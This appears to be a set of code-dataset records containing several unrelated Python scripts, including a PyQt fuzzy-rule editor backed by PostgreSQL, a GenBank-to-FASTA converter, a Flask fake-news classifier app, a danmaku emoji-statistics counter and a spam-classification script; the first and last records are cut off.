'hedge'):\n hedge_id = nodesCombo.currentData()\n cur = self.conn.cursor()\n cur.execute('INSERT INTO nodes (parent_id, type_id, variable_id, term_id, hedge_id) VALUES (%s, %s, %s, %s, %s) RETURNING id;', (parent_id, nodeTypesCombo.currentData(), variable_id, term_id, hedge_id))\n node_id = cur.fetchone()[0]\n self.conn.commit()\n cur.close()\n item = QTreeWidgetItem()\n if (nodesCombo.isEnabled()):\n item.setText(0, '(%s) %s' % (nodeTypesCombo.currentText(), nodesCombo.currentText()))\n else:\n item.setText(0, '(%s)' % nodeTypesCombo.currentText())\n item.setText(1, '%s' % node_id)\n if (tree.currentItem()):\n tree.currentItem().addChild(item)\n else:\n tree.addTopLevelItem(item)\n tree.setCurrentItem(item)\n item.setExpanded(True)\n self.onNodeSelected(tree, nodeTypesCombo, nodesCombo, addNodeButton, removeNodeButton, edit)\n\n def onAddAntecedentNodeClicked(self):\n self.addNode(self.uiAntecedentTree, self.uiAntecedentNodesCombo, self.uiAntecedentNodeTypesCombo, \n self.uiAddAntecedentNodeButton, self.uiRemoveAntecedentNodeButton, self.uiAntecedentEdit)\n self.uiCommitRuleButton.setEnabled(True)\n \n def nodeType(self, node):\n cur = self.conn.cursor()\n cur.execute('SELECT types.name FROM nodes, types WHERE nodes.type_id = types.id AND nodes.id = %s;', (node.text(1),))\n name = cur.fetchone()[0]\n cur.close()\n return name\n\n def fillNodeTypesCombo(self, node, combo):\n combo.blockSignals(True)\n combo.clear()\n if node != None:\n name = self.nodeType(node)\n if name in ('variable', 'term', 'hedge'):\n combo.setEnabled(False)\n elif name == 'term_complex':\n if (node.childCount() == 0):\n combo.addItem('hedge', 2)\n combo.setEnabled(True)\n elif (node.childCount() == 1):\n combo.addItem('term', 3)\n combo.addItem('term_complex', 4)\n combo.addItem('term_and', 6)\n combo.addItem('term_or', 7)\n combo.setEnabled(True)\n else:\n combo.setEnabled(False)\n elif name == 'variable_value':\n if (node.childCount() == 0):\n combo.addItem('variable', 1)\n combo.setEnabled(True)\n elif (node.childCount() == 1):\n combo.addItem('term', 3)\n combo.addItem('term_complex', 4)\n combo.addItem('term_and', 6)\n combo.addItem('term_or', 7)\n combo.setEnabled(True)\n else:\n combo.setEnabled(False)\n elif name == 'term_and' or name == 'term_or':\n combo.addItem('term', 3)\n combo.addItem('term_complex', 4)\n combo.setEnabled(True)\n elif name == 'variable_and' or name == 'variable_or':\n combo.addItem('variable_value', 5)\n combo.setEnabled(True)\n else:\n combo.addItem('variable_value', 5)\n combo.addItem('variable_and', 8)\n combo.addItem('variable_or', 9)\n combo.setEnabled(True)\n combo.setCurrentIndex(-1)\n combo.blockSignals(False)\n\n def onNodeSelected(self, tree, nodeTypesCombo, nodesCombo, addNodeButton, removeNodeButton, edit):\n node = tree.currentItem()\n self.fillNodeTypesCombo(node, nodeTypesCombo)\n nodesCombo.blockSignals(True)\n nodesCombo.clear()\n nodesCombo.setCurrentIndex(-1)\n nodesCombo.setEnabled(False)\n nodesCombo.blockSignals(False)\n addNodeButton.setEnabled(False)\n if node != None:\n name = self.nodeType(node)\n if name == 'variable' and node.parent().childCount() > 1:\n removeNodeButton.setEnabled(False)\n else:\n removeNodeButton.setEnabled(True)\n edit.setEnabled(True)\n edit.setText(self.nodeToString(node))\n else:\n edit.setEnabled(False)\n edit.clear()\n\n def onAntecedentNodeSelected(self):\n self.onNodeSelected(self.uiAntecedentTree, self.uiAntecedentNodeTypesCombo, self.uiAntecedentNodesCombo, \n self.uiAddAntecedentNodeButton, self.uiRemoveAntecedentNodeButton, self.uiAntecedentEdit)\n\n def onRemoveAntecedentNodeClicked(self):\n current = self.uiAntecedentTree.currentItem()\n cur = self.conn.cursor()\n cur.execute('DELETE FROM nodes WHERE id = %s;', (current.text(1),))\n self.conn.commit()\n cur.close()\n if (current.parent()):\n current.parent().takeChild(current.parent().indexOfChild(current))\n else:\n self.uiAntecedentTree.takeTopLevelItem(self.uiAntecedentTree.indexOfTopLevelItem(current))\n if (self.uiAntecedentTree.topLevelItemCount() == 0):\n self.uiRemoveAntecedentNodeButton.setEnabled(False)\n self.uiAddAntecedentNodeButton.setEnabled(False)\n else:\n self.uiCommitRuleButton.setEnabled(True)\n self.onAntecedentNodeSelected()\n\n def onConsequentNodeTypeSelected(self):\n self.uiConsequentNodesCombo.clear()\n self.uiConsequentNodesCombo.setEnabled(False)\n if (self.uiConsequentNodeTypesCombo.currentIndex() == -1):\n return\n self.uiConsequentNodesCombo.blockSignals(True)\n if (self.uiConsequentNodeTypesCombo.currentText() in ('variable', 'term', 'hedge')):\n self.fillComboWithValues(self.uiConsequentNodesCombo, self.uiConsequentTree.currentItem(),\n self.uiConsequentNodeTypesCombo.currentText())\n self.uiConsequentNodesCombo.setEnabled(True)\n self.uiAddConsequentNodeButton.setEnabled(False)\n else:\n self.uiAddConsequentNodeButton.setEnabled(True)\n self.uiConsequentNodesCombo.blockSignals(False)\n\n def onConsequentNodeValueSelected(self):\n if (self.uiConsequentNodesCombo.currentIndex() != -1):\n self.uiAddConsequentNodeButton.setEnabled(True)\n\n def onAddConsequentNodeClicked(self):\n self.addNode(self.uiConsequentTree, self.uiConsequentNodesCombo, self.uiConsequentNodeTypesCombo, \n self.uiAddConsequentNodeButton, self.uiRemoveConsequentNodeButton, self.uiConsequentEdit)\n self.uiCommitRuleButton.setEnabled(True)\n\n def onConsequentNodeSelected(self):\n self.onNodeSelected(self.uiConsequentTree, self.uiConsequentNodeTypesCombo, self.uiConsequentNodesCombo, \n self.uiAddConsequentNodeButton, self.uiRemoveConsequentNodeButton, self.uiConsequentEdit)\n\n def onRemoveConsequentNodeClicked(self):\n current = self.uiConsequentTree.currentItem()\n cur = self.conn.cursor()\n cur.execute('DELETE FROM nodes WHERE id = %s;', (current.text(1),))\n self.conn.commit()\n cur.close()\n if (current.parent()):\n current.parent().takeChild(current.parent().indexOfChild(current))\n else:\n self.uiConsequentTree.takeTopLevelItem(self.uiConsequentTree.indexOfTopLevelItem(current))\n if (self.uiConsequentTree.topLevelItemCount() == 0):\n self.uiRemoveConsequentNodeButton.setEnabled(False)\n self.uiAddConsequentNodeButton.setEnabled(False)\n else:\n self.uiCommitRuleButton.setEnabled(True)\n self.onConsequentNodeSelected()\n\n def onRuleVerified(self):\n self.uiCommitRuleButton.setEnabled(True)\n\n def onNoteEdited(self):\n if self.uiAntecedentTree.topLevelItemCount() != 0 and self.uiConsequentTree.topLevelItemCount() != 0:\n self.uiCommitRuleButton.setEnabled(True)\n\n def walkTree(self, root, cur):\n self.walkNodes(root, root, cur)\n for i in range(root.childCount()):\n self.walkTree(root.child(i), cur)\n\n def walkNodes(self, root, node, cur):\n cur.execute('SELECT * FROM closures WHERE ancestor_id = %s AND descendant_id = %s LIMIT 1;', (root.text(1), node.text(1)))\n if not cur.fetchone():\n cur.execute('INSERT INTO closures (ancestor_id, descendant_id) VALUES (%s, %s);', (root.text(1), node.text(1)))\n for i in range(node.childCount()):\n self.walkNodes(root, node.child(i), cur)\n\n def commitRule(self):\n self.uiCommitRuleButton.setEnabled(False)\n cur = self.conn.cursor()\n self.walkTree(self.uiAntecedentTree.topLevelItem(0), cur) \n self.walkTree(self.uiConsequentTree.topLevelItem(0), cur) \n rule_id = self.uiRulesCombo.currentData()\n if (rule_id):\n cur.execute('UPDATE rules SET validated = %s, name = %s, note = %s, antecedent_id = %s, consequent_id = %s WHERE id = %s;', \n (self.uiRuleVerifiedCheck.isChecked(), self.uiRulesCombo.currentText(), self.uiNoteEdit.text(),\n self.uiAntecedentTree.topLevelItem(0).text(1), self.uiConsequentTree.topLevelItem(0).text(1), rule_id))\n else:\n cur.execute('INSERT INTO rules (validated, name, note, antecedent_id, consequent_id) VALUES (%s, %s, %s, %s, %s) RETURNING id;', \n (self.uiRuleVerifiedCheck.isChecked(), self.uiRulesCombo.currentText(), self.uiNoteEdit.text(), \n self.uiAntecedentTree.topLevelItem(0).text(1), self.uiConsequentTree.topLevelItem(0).text(1)))\n rule_id = cur.fetchone()[0]\n self.uiRulesCombo.setItemData(self.uiRulesCombo.currentIndex(), rule_id)\n self.conn.commit()\n cur.close()\n\n # Actions on debug tab\n\n def fillTable(self, query):\n cur = self.conn.cursor()\n cur.execute(query)\n rows = cur.fetchall()\n self.uiDataTable.clear()\n self.uiDataTable.setRowCount(cur.rowcount)\n self.uiDataTable.setColumnCount(len(cur.description))\n self.uiDataTable.setHorizontalHeaderLabels([desc[0] for desc in cur.description])\n self.uiDataTable.setSortingEnabled(False)\n i = 0\n for row in rows:\n for j in range(0, len(row)):\n item = QTableWidgetItem('%s' % row[j])\n self.uiDataTable.setItem(i, j, item)\n i += 1\n cur.close()\n self.uiDataTable.setSortingEnabled(True)\n self.uiDataTable.setEnabled(True)\n\n def onModeSelected(self):\n if (self.uiModeCombo.currentData() == 0):\n self.fillTable('SELECT variables.id, variables.name, variables.name_id, variables.min, variables.max, variables.validated FROM variables;')\n elif (self.uiModeCombo.currentData() == 1):\n self.fillTable('SELECT terms.id, terms.name, terms.name_id, functions.name, terms.points, terms.validated FROM terms, functions WHERE terms.function_id = functions.id;')\n elif (self.uiModeCombo.currentData() == 2):\n self.fillTable('SELECT hedges.id, hedges.name, hedges.name_id, hedges.result, hedges.validated FROM hedges;')\n elif (self.uiModeCombo.currentData() == 3):\n self.fillTable('SELECT variables.id, variables.name, variables.name_id, variables.min, variables.max, variables.validated, terms.id, terms.name, terms.name_id, functions.name, terms.points, terms.validated FROM variables, terms, functions, variables_terms WHERE variables.id = variables_terms.variable_id AND terms.id = variables_terms.term_id AND terms.function_id = functions.id;')\n elif (self.uiModeCombo.currentData() == 4):\n self.fillTable('SELECT variables.id, variables.name, variables.name_id, variables.min, variables.max, variables.validated, hedges.id, hedges.name, hedges.name_id, hedges.result, hedges.validated FROM variables, hedges, variables_hedges WHERE variables.id = variables_hedges.variable_id AND hedges.id = variables_hedges.hedge_id;')\n elif (self.uiModeCombo.currentData() == 5):\n self.fillTable('SELECT synonims.id, synonims.group_id, synonims.lemma, synonims.grammemes, synonims.hits, groups.is_variable, groups.is_term, groups.is_hedge FROM synonims, groups WHERE synonims.group_id = groups.id;')\n elif (self.uiModeCombo.currentData() == 6):\n self.fillTable('SELECT rules.id, rules.name, rules.antecedent_id, rules.consequent_id, rules.validated FROM rules;')\n elif (self.uiModeCombo.currentData() == 7):\n self.fillTable('SELECT nodes.id, nodes.parent_id, types.name, nodes.variable_id, nodes.term_id, nodes.hedge_id FROM nodes, types WHERE nodes.type_id = types.id;')\n else:\n self.uiDataTable.setEnabled(False)\n self.uiDataTable.clear()\n self.uiDataTable.setRowCount(0)\n self.uiDataTable.setColumnCount(0)\n\n # Actions on main window\n\n def onTabChanged(self):\n if (self.uiTabs.currentIndex() == 0):\n self.loadTerms()\n self.loadHedges()\n self.onVariableSelected()\n elif (self.uiTabs.currentIndex() == 4):\n self.uiModeCombo.setCurrentIndex(-1)\n\n def __del__(self):\n self.conn.close()\n","sub_path":"expert.py","file_name":"expert.py","file_ext":"py","file_size_in_byte":53090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"398443002","text":"import re\r\nfh = open('insulin.gbk', 'r')\r\nlines = []\r\nfor l in fh:\r\n if l.startswith('ACCESSION'):\r\n l = l.strip('\\n')\r\n field1 = l.split(' ')[-1]\r\n \r\n if re.findall(r'ORGANISM', l):\r\n l = l.strip('\\n')\r\n field2 = l.split(' ')[-2] + ' ' + l.split(' ')[-1]\r\n\r\n if l.startswith('ORIGIN'):\r\n for l in fh:\r\n l = l.strip('\\n')\r\n l = l.strip(' ')\r\n l = ''.join([i for i in l if not i.isdigit()])\r\n l = l.replace(' ','')\r\n lines.append(l.upper())\r\n \r\nout = open('output.txt', 'w')\r\nout.write('>'+field1+'|'+field2+'\\n')\r\n\r\nfor l in lines[0:-1]:\r\n out.write(l+'\\n')\r\n \r\nout.close()\r\nfh.close()","sub_path":"exam/Final_exam and mid_term/converter.py","file_name":"converter.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"232382404","text":"#Importing the Libraries\n\n#flask is use for run the web application.\nimport flask\n#request is use for accessing file which was uploaded by the user on our application.\nfrom flask import Flask, request,render_template \nfrom flask_cors import CORS\n\n#Python pickle module is used for serializing\n# and de-serializing a Python object structure.\nimport pickle\n\n#OS module in python provides functions for interacting with the operating system\nimport os\n\n#Newspaper is used for extracting and parsing newspaper articles.\n#For extracting all the useful text from a website.\nfrom newspaper import Article\n\n#URLlib is use for the urlopen function and is able to fetch URLs.\n#This module helps to define functions and classes to open URLs \nimport urllib\n\n#Loading Flask and assigning the model variable\napp = Flask(__name__)\nCORS(app)\napp=flask.Flask(__name__,template_folder='templates')\n\nwith open('model.pkl', 'rb') as handle:\n model = pickle.load(handle)\n\n\n@app.route('/') #default route\ndef main():\n return render_template('main.html')\n\n#Receiving the input url from the user and using Web Scrapping to extract the news content\n\n#Route for prediction\n\n@app.route('/predict',methods=['GET','POST'])\n\n\ndef predict():\n\t#Contains the incoming request data as string in case.\t\n url =request.get_data(as_text=True)[5:]\n\t\n\t#The URL parsing functions focus on splitting a URL string into its components, \n\t#or on combining URL components into a URL string.\n url = urllib.parse.unquote(url)\n\t\n\t#A new article come from Url and convert onto string\n article = Article(str(url))\t\n\t\n\t#To download the article \n article.download()\n\t\n\t#To parse the article \n article.parse()\n\t\n\t#To perform natural language processing ie..nlp\n article.nlp()\n\t#To extract summary \n news = article.summary\n print(type(news))\n\n #Passing the news article to the model and returing whether it is Fake or Real\n pred = model.predict([news])\n print(pred)\n return render_template('main.html', prediction_text='The news is \"{}\"'.format(pred[0]))\n \nif __name__==\"__main__\":\n port=int(os.environ.get('PORT',5000))\n app.run(port=port,debug=True,use_reloader=False)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"353432689","text":"import os\nimport time\nimport pickle\nimport hyperloglog\nfrom biliminer.Helper import *\n\nclass Emoj:\n def __init__(self, emo):\n self.emo = emo\n self.count = 0\n self.dic = dict()\n\n def __le__(self, other):\n return self.count <= other.count\n\n def __lt__(self, other):\n return self.count < other.count\n\n def __str__(self):\n return str((self.emo, self.count))\n\n def add(self, timestamp):\n self.count += 1\n Emoc.add_month(timestamp, self.dic)\n\n\nclass Emoc:\n\n def __init__(self):\n # self.unique = set()\n self.hll = hyperloglog.HyperLogLog(0.01)\n\n self.files_sofar = 0\n self.clock = 0\n\n self.first = set()\n self.nes = set()\n self.sec = list()\n self.emo_counter = list()\n self.emo_user_counter = dict()\n self.emo_month_counter = dict()\n self.danmaku_month_counter = dict()\n\n self.file_num = 0\n self.danmaku_num = 0\n self.file_emo_num = 0\n\n self.file_meng = 0\n self.file_233_num = 0\n self.file_ka_num = 0\n self.file_sb_num = 0\n self.file_xxs_num = 0\n\n self.num233 = 0\n self.xiaoxuesheng_num = 0\n self.ka_num = 0\n self.sb_num = 0\n self.meng_num = 0\n self.meng_counter = dict()\n\n self.emo_user_counter = dict()\n self.emo_month_counter = dict()\n self.danmaku_month_counter = dict()\n\n self.last_file = 0\n\n with open(\"first.txt\", \"r\") as file:\n line = file.readline().rstrip()\n for char in line:\n self.first.add(char)\n\n with open(\"nes.txt\", \"r\") as file:\n line = file.readline().rstrip()\n for char in line:\n self.nes.add(char)\n\n with open(\"sec.txt\", \"r\") as file:\n for line in file:\n self.sec.append(line.rstrip())\n\n with open(\"total.txt\", \"r\") as file:\n for line in file:\n self.emo_counter.append(Emoj(line.rstrip()))\n\n def count_233(self, danmaku):\n if \"233\" in danmaku:\n self.num233 += 1\n\n def count_xiaoxuesheng(self, danmaku):\n if \"小学生\" in danmaku:\n self.xiaoxuesheng_num += 1\n\n def count_meng(self, danmaku, creation_time):\n if \"萌\" in danmaku:\n self.add_month(creation_time, self.meng_counter)\n self.meng_num += 1\n\n def count_ka(self, danmaku):\n if \"卡\" in danmaku:\n self.ka_num += 1\n\n def count_sb(self, danmaku):\n if \"sb\" in danmaku or \"Sb\" in danmaku or \"SB\" in danmaku or \"傻\" in danmaku:\n self.sb_num += 1\n\n def should_check(self, line_set):\n if not (line_set & self.first):\n return False\n else:\n return True\n\n def first_check(self, line_set):\n if line_set & self.nes:\n return True\n else:\n return False\n\n def second_check(self, line):\n for item in self.sec:\n if item in line:\n return True\n return False\n\n def add_emo(self, line, user, creation_time):\n for emoj in self.emo_counter:\n if emoj.emo in line:\n emoj.add(creation_time)\n # print(line, emoj)\n self.deal_user(user)\n self.emo_add_month(creation_time)\n\n def count_emoj(self, line, user, creation_time):\n line_set = set(line)\n if self.should_check(line_set):\n if self.first_check(line_set) or self.second_check(line):\n self.add_emo(line, user, creation_time)\n\n def add_user(self, user):\n self.hll.add(user)\n\n @staticmethod\n def is_danmaku_file(filename):\n parts = filename.split('.')\n if parts[-1] != \"txt\":\n return False\n else:\n try:\n i = int(parts[0])\n except ValueError:\n return False\n else:\n return i > 0\n\n def dealer(self):\n location = input(\"location:\\n\")\n if location[-1] != \"/\":\n location += \"/\"\n dirs = os.listdir(location)\n\n self.clock = time.clock()\n for dc in dirs:\n print(dc)\n sublocation = location + str(dc)\n print(sublocation)\n if not os.path.isdir(sublocation):\n continue\n\n files = os.listdir(sublocation)\n if sublocation[-1] != \"/\":\n sublocation += \"/\"\n\n for filedir in files:\n\n if not self.is_danmaku_file(filedir):\n continue\n\n self.last_file = filedir\n self.file_num += 1\n self.files_sofar += 1\n if self.files_sofar % 1000 == 0:\n print(filedir, \"speed: \", 1000 / (time.clock() - self.clock))\n self.clock = time.clock()\n\n xxs = self.xiaoxuesheng_num\n sb = self.sb_num\n ka = self.ka_num\n n233 = self.num233\n meng = self.meng_num\n\n emo = self.get_total_emo_num()\n\n with open(sublocation + filedir, \"r\") as file:\n self.deal_file(file)\n\n if xxs < self.xiaoxuesheng_num:\n self.file_xxs_num += 1\n if sb < self.sb_num:\n self.file_sb_num += 1\n if ka < self.ka_num:\n self.file_ka_num += 1\n if n233 < self.num233:\n self.file_233_num += 1\n if emo < self.get_total_emo_num():\n self.file_emo_num += 1\n if meng < self.meng_num:\n self.file_meng += 1\n\n def deal_file(self, file):\n for line in file:\n danmaku_info = line.rstrip().split(\"$#$\")\n try:\n danmaku = danmaku_info[0]\n user = int(\"0x\" + danmaku_info[1], base=16)\n creation_time = int(danmaku_info[2])\n except:\n continue\n else:\n self.danmaku_num += 1\n self.danmaku_add_month(creation_time)\n\n self.count_emoj(danmaku, user, creation_time)\n self.add_user(danmaku_info[1])\n # self.unique.add(danmaku_info[1])\n self.count_ka(danmaku)\n self.count_233(danmaku)\n self.count_xiaoxuesheng(danmaku)\n self.count_sb(danmaku)\n self.count_meng(danmaku, creation_time)\n\n def deal_user(self, user):\n num = self.emo_user_counter.get(user, 0)\n self.emo_user_counter[user] = num + 1\n\n def get_total_emo_num(self):\n counter = 0\n for emoj in self.emo_counter:\n counter += emoj.count\n return counter\n\n def pickle_this(self):\n with open(str(self.last_file)[:-4] + \"emoc.pkl\", \"wb\") as pk:\n pickle.dump(self, pk)\n\n @staticmethod\n def restore_pkl():\n pic = input(\"pickle file name: \\n\")\n with open(pic, \"rb\") as pk:\n return pickle.load(pk)\n\n @staticmethod\n def get_year_month(timestamp):\n localtime = time.localtime(timestamp)\n return localtime.tm_year, localtime.tm_mon\n\n @staticmethod\n def add_month(timestamp, dictionary):\n year_month = Emoc.get_year_month(timestamp)\n value = dictionary.get(year_month, 0)\n dictionary[year_month] = value + 1\n\n def danmaku_add_month(self, timestamp):\n self.add_month(timestamp, self.danmaku_month_counter)\n\n def emo_add_month(self, timestamp):\n self.add_month(timestamp, self.emo_month_counter)\n\n def __str__(self):\n return str((\"user: \" + str(len(self.hll)), \"files: \" + str(self.file_num), \"emo_files: \"+ str(self.file_emo_num),\n \"meng_files: \" + str(self.file_meng),\n \"233_files: \" + str(self.file_233_num), \"sb_files: \" + str(self.file_sb_num),\n \"ka_files: \" + str(self.file_ka_num), \"xxs_files: \" + str(self.file_xxs_num),\n \"danmakus: \" + str(self.danmaku_num),\n \"emo: \" + str(self.get_total_emo_num()),\n \"meng: \" + str(self.meng_num),\n \"233: \" + str(self.num233),\n \"ka: \" + str(self.ka_num), \"xxs: \" + str(self.xiaoxuesheng_num), \"sb: \" + str(self.sb_num)))\n\n def print_emo_counter(self):\n print(\"********** emo counter **********\")\n self.emo_counter.sort(reverse=True)\n for emoj in self.emo_counter:\n if emoj.count > 0:\n print(emoj)\n self.print_dict(emoj.dic)\n\n @staticmethod\n def print_dic_size(dictionary):\n print(len(dictionary.keys()))\n\n def print_user_counter(self):\n print(\"*\" * 10 + \" user emo counter\" + \"*\" * 10)\n self.print_dic_size(self.emo_user_counter)\n # self.print_dict(self.emo_user_counter)\n\n def print_danmaku_month_counter(self):\n print(\"********** danmaku month counter **********\")\n self.print_dict(self.danmaku_month_counter)\n\n def print_emo_month_counter(self):\n print(\"*\" * 10 + \" emo month counter \" + \"*\" * 10)\n self.print_dict(self.emo_month_counter)\n\n def print_meng_counter(self):\n print(\"*\" * 10 + \" meng month counter \" + \"*\" * 10)\n self.print_dict(self.meng_counter)\n\n @staticmethod\n def print_dict(dictionary):\n dic = dict_to_sorted_list(dictionary)\n for monthyear, count in dic:\n print(monthyear, \" \", count)\n\n\ndef deal_pickle():\n choice = input(\"Delete pkl? ('YES' to delete)\\n\")\n try:\n if choice == \"YES\":\n os.popen(\"rm /Users/billlai/workspace/python/bilimining/biliminer/emoc.pkl\")\n except Exception as e:\n print(e)\n\n\ndef deal():\n deal_pickle()\n print(time.localtime())\n start_time = time.clock()\n try:\n if input(\"New pickle? (YES)\\n\") == \"YES\":\n e = Emoc()\n else:\n e = Emoc.restore_pkl()\n print(\"Restored!\")\n e.files_sofar = 0\n\n except Exception as exception:\n print(exception)\n else:\n try:\n e.dealer()\n except KeyboardInterrupt:\n pass\n except Exception as exception:\n print(exception)\n finally:\n print(time.clock() - start_time)\n e.pickle_this()\n print(\"Pickled!\")\n print(\"Last danmaku num: \", e.last_file)\n\n\ndef show(e=None):\n if not e:\n try:\n e = Emoc.restore_pkl()\n print(\"Restored!\")\n except:\n print(\"Error: No emoc found!\")\n exit(1)\n\n # print(len(e.sec))\n # for i in e.emo_counter:\n # print(i)\n print(e)\n # count, l = count_meng_emo(e.emo_counter)\n # print(count)\n # for i in l:\n # print(i)\n # for i in count_to_year(e.emo_month_counter):\n # print(i)\n e.print_user_counter()\n e.print_danmaku_month_counter()\n e.print_emo_month_counter()\n e.print_meng_counter()\n e.print_emo_counter()\n\n\nif __name__ == \"__main__\":\n choice = input(\"Show(default) or Deal(d)\\n\")\n if choice == \"d\":\n deal()\n else:\n show()\n","sub_path":"biliminer/emo_counter.py","file_name":"emo_counter.py","file_ext":"py","file_size_in_byte":11264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"632720592","text":"import os\nimport pandas as pd\nimport numpy as np\n\npastaT = 'C:/Users/brunn/Google Drive/Doutorado/Resultados/Artigo GRRS/Analise IND/'\npastaI = 'C:/Users/brunn/Google Drive/Doutorado/Resultados/Artigo GRRS/Analise TRAN/'\n\ncaminhosT = [os.path.join(pastaT, nome) for nome in os.listdir(pastaT)]\ncaminhosI = [os.path.join(pastaI, nome) for nome in os.listdir(pastaI)]\n\nnomes = ['Co-training - KNN', \n 'Co-training - LR', \n 'Co-training - MLP',\n 'Co-training - NB',\n 'Co-training - RF',\n 'Co-training - SVM',\n 'SEEDED K-means',\n 'Proposed Model', \n 'Self-Training - KNN', \n 'Self-Training - lR', \n 'Self-Training - MLP', \n 'Self-Training - NB', \n 'Self-Training - RF', \n 'Self-Training - SVM',\n 'Tri-Training - KNN', \n 'Tri-Training - LR',\n 'Tri-Training - MLP',\n 'Tri-Training - NB',\n 'Tri-Training - RF',\n 'Tri-Training - SVM']\n\n#resultado = pd.DataFrame()\n\ninfo = []\ncolunas = ['MODELO','50','D50', '100','D100', '150','D150', '200','D200', '250','D250', '300','D300']\nfor i, caminho in enumerate(caminhosT):\n \n dados = pd.read_csv(caminho)\n acuracia = np.round(dados['ACURACIA'].values, 3)\n dpa = np.round(dados['DPA'].values, 3)\n kappa = np.round(dados['KAPPA'].values, 3)\n dpk = np.round(dados['DPK'].values, 3)\n \n linha_acuracia = []\n linha_acuracia.append(nomes[i])\n for i, a in enumerate(acuracia):\n linha_acuracia.append(a)\n linha_acuracia.append(dpa[i])\n info.append(linha_acuracia)\n\nresultado = pd.DataFrame(info, columns=colunas)\nresultado.to_csv('C:/Users/brunn/Google Drive/Doutorado/Resultados/Artigo GRRS/Analise Final/resultado_transdutivo.csv', index=False)\n \n ","sub_path":"graficos_resultados.py","file_name":"graficos_resultados.py","file_ext":"py","file_size_in_byte":1782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"111566148","text":"from unittest import main as start_test\nfrom unittest import TestCase\n\n\ndef accum(s):\n \"\"\"\"Mumbling\" - https://www.codewars.com/kata/5667e8f4e3f572a8f2000039/train/python\"\"\"\n result = \"\"\n # ебошим нашу строчку в лист, да еще и в гижнем регистре\n l = list(s.lower())\n # для каждого символа в листе\n for c in l:\n # берем индекс\n iindex = l.index(c)\n # пока индекс не отрицателен\n while iindex > -1:\n # прибавляем к результату символ\n result += c\n # уменьшаем индекс\n iindex -= 1\n # ебошим еще в конце пробел\n result += \" \"\n # тут ебошится костыль для того что бы избежать траблов с 'l.index(c)',\n # т.к. эта конструкция возвращает индекс первого встречнго элемента\n # про enumerate нашел тут - https://docs.python.org/2.3/whatsnew/section-enumerate.html\n for i, num in enumerate(l):\n # если встретили наш символ из лупа выше\n if num == c:\n # заменяем его на то, что маловероятно встретится в тестах\n l[i] = '╨' # можно кстати ебануть '\\udce2'\n # и после дропаем этот луп\n break\n\n # а тут вот такая логика:\n # 1. ебошим верблюда в словах(благо есть такая хня как 'title()')\n # 2. потом слайсим последний элемент(это тот самый 'result += \" \"')\n # 3. а потом все пробелы заменяем '-'\n return result.title()[:-1].replace(\" \", \"-\")\n\n\n# а в предложках к задаче вот такое решение: 'return '-'.join(c.upper() + c.lower() * i for i, c in enumerate(s))'\n# ебать Я лошара :D\n\n\nclass TestGreet(TestCase):\n def test_simple(self):\n self.assertEqual(accum(\"abc\"), \"A-Bb-Ccc\")\n\n def test_extra(self):\n self.assertEqual(accum(\"ZpglnRxqenU\"),\n \"Z-Pp-Ggg-Llll-Nnnnn-Rrrrrr-Xxxxxxx-Qqqqqqqq-Eeeeeeeee-Nnnnnnnnnn-Uuuuuuuuuuu\")\n self.assertEqual(accum(\"NyffsGeyylB\"),\n \"N-Yy-Fff-Ffff-Sssss-Gggggg-Eeeeeee-Yyyyyyyy-Yyyyyyyyy-Llllllllll-Bbbbbbbbbbb\")\n self.assertEqual(accum(\"MjtkuBovqrU\"),\n \"M-Jj-Ttt-Kkkk-Uuuuu-Bbbbbb-Ooooooo-Vvvvvvvv-Qqqqqqqqq-Rrrrrrrrrr-Uuuuuuuuuuu\")\n self.assertEqual(accum(\"EvidjUnokmM\"),\n \"E-Vv-Iii-Dddd-Jjjjj-Uuuuuu-Nnnnnnn-Oooooooo-Kkkkkkkkk-Mmmmmmmmmm-Mmmmmmmmmmm\")\n self.assertEqual(accum(\"HbideVbxncC\"),\n \"H-Bb-Iii-Dddd-Eeeee-Vvvvvv-Bbbbbbb-Xxxxxxxx-Nnnnnnnnn-Cccccccccc-Ccccccccccc\")\n\n\nif __name__ == '__main__':\n start_test()\n","sub_path":"src/code_wars/mumbling.py","file_name":"mumbling.py","file_ext":"py","file_size_in_byte":3095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"644899460","text":"import csv\n\nfrom scipy.sparse import csr_matrix\nfrom sklearn.svm import SVC\n\nfrom Services import SpamTools\nimport ast\nimport operator\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.feature_extraction.text import TfidfTransformer\nfrom sklearn.naive_bayes import MultinomialNB\n\nimport numpy as np\n\ncsvData = []\ni = 0\ntestData = []\n\nwith open('../Etc/test2.csv', 'rt', encoding=\"utf8\") as f:\n reader = csv.DictReader(f)\n\n for row in reader:\n tweet_id = row[\"tweet_id\"].strip()\n clear_text = row[\"clear_text\"].strip()\n\n spam = False\n irrelevante = False\n\n # print \"c: {} - s: {} | i: {}\".format(clear_text, spam, irrelevante)\n csvData.append((clear_text, spam))\n\ngeten = csvData[:20]\ntarg = []\ntweets = []\nfeatureVector = {}\n\n\ndef updateVector(features):\n for feature in features:\n try:\n featureVector[feature] = featureVector[feature] + 1\n except:\n featureVector[feature] = 1\n\n\ndef removeFrequencyFromVector(qtd):\n featureVectors = {k: v for k, v in featureVector.items() if v > qtd}\n fileredVector = sorted(featureVectors.items(), key=operator.itemgetter(1))\n return list(map(lambda x: x[0], fileredVector))\n\n\ndef removeFrequencyFromTweets():\n newTweets = []\n\n for tweet in tweets:\n newTweets.append(\" \".join(list(filter(lambda x: x in featureVector, tweet))))\n return newTweets\n\n\nfor obj in geten:\n\n if i % 2 == 0:\n spam = True\n else:\n spam = False\n\n i = i + 1\n\n testData.append({\"clear_text\": obj[0], \"is_spam\": spam})\n ww = SpamTools.getFeatureVector(obj[0], 2, [])\n updateVector(ww)\n tweets.append(ww)\n targ.append(spam)\n\nfeatureVector = removeFrequencyFromVector(0)\ntweets = removeFrequencyFromTweets()\nprint(featureVector)\n\n\ncount_vect = CountVectorizer()\nX_train_counts = 